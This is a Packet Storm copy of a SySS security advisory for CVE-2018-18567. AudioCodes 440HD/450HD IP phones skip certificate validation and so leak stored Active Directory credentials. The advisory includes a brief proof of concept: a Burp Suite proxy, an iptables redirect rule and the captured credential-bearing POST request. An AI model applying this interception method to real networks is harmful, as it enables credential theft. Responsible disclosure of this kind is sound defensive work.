what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle

AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle
Posted Oct 24, 2018
Authored by Micha Borrmann | Site syss.de

AudioCodes 440HD / 450HD IP Phone versions 3.1.2.89 and below suffer from a man-in-the-middle vulnerability.

tags | exploit
advisories | CVE-2018-18567
SHA-256 | 60e19e61a99c7d9dabb6688f443d8a862df2c3e07135d755e7dfeaf5d3b99db3

AudioCodes 440HD / 450HD IP Phone 3.1.2.89 Man-In-The-Middle

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2018-026
Product: 440HD / 450HD IP Phone
Manufacturer: AudioCodes
Affected Version(s): <= 3.1.2.89
Tested Version(s): VC_3.1.1.43.1, VC_3.1.2.89
Vulnerability Type: X.509 validation - Man-in-the-Middle (CWE-300)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2018-08-29
Solution Date: 20??-??-??
Public Disclosure: 2018-10-23
CVE Reference: CVE-2018-18567
Author of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a AudioCodes 440HD/450HD IP Phone [1] is used with an on-premise
installation with Skype for Business, the phone has stored credentials
of an account in the active directory. Performing a man-in-the-middle
attack, the phone give away the credentials to an attacker and
therefore the account will be compromised. The phone itself is fully
functional and will not show any hints of an attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone sends the stored credentials to a website usually named
skypewebpool via HTTPS but does not validate the X.509 certificate.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Configure Burp Suite as invisible proxy an gain a Man-in-the-Middle-position.

Set an iptables rule, that routes the traffic through Burp Suite, like

# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.100 -p tcp --dport 443 -j REDIRECT --to-port 8080

Watch the proxy history for a HTTP POST request like

POST /WebTicket/oauthtoken HTTP/1.1
Host: skypewebpool.example.com
User-Agent: AUDC/3.1.1.43 AUDC-IPPhone-440HD_UC_3.1.1.43/1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
Connection: close

grant_type=password&client_id=abc...&resource=https%3a%2f%2fskypewebpool.example.com&password=verytopsecretpassword&username=ADaccountname

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, which has a trust store integrated and a
strict X.509 certificate validation policy, too.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-09-06: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
https://www.audiocodes.com/solutions-products/products/ip-phones/440hd-ip-phone
https://www.audiocodes.com/solutions-products/products/ip-phones/450hd-ip-phone
[2] SySS Security Advisory SYSS-2018-026
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-026.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlvO5MAACgkQ7b4m5xTq
WHbTUg/+OAJuLzuW8Uu2VuP4EeJyRfL8XqZP3TVjpsueOb2XhHpUhugVpd3Dh/I/
cF1tZoyTnt41smNxEAnKFpPikEAdem4M9zvAmyDzWmQaqmqUBQAsEShM3ACdshEN
+8zKnXFvjwLHOMKKX7jJ5S76OH8YeYpOwLNc0vTXFLv4Nt+1wpTWR8qHR/xAjRrW
uKH0CJrjs408gRoyvssUSpKiOWh+uVRq/NVvGIpGtwGBAZEmcgG4TD4tszOjRao6
WFGIs039rQhbLaqeD2LXn9yLU5uSh1h+QkqmaOM/MSAOGXmgSG4zIo3REu1GY9w5
uIvrVytoGsqcVRLqpHX/oq1Xkr3krzCZYuNAnVWkULFx90K/SZ143gWZFan95wJA
2FPmbW71kkSVC5aW4nFuIfQyyL5Gm7BF7YptrnNMpJbY9VMnGCwJxQsJmBBas/yH
txBtYMxqmY0L+tNfqK5Iqm4OeNiYI/ef95Rl677jBnh3+4nrmcESQagetpV3wz1D
qkumdytXIV8p8sgOCuRHNtnno0en08oJCZw1D/eQ8OHX9HbbIYNNJxnqlWXet/OT
8W7blNwmpIPzXMa7oB42amQCUYdWgkHPCKsVS8aHBi0mhrU5sEWEvYfQO1Ef8qMW
zFbgBh/qH4lEdoZRL5yKlrPmQcukCyAf+4VuFRUCJdXkeTfzf7M=
=yKAX
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close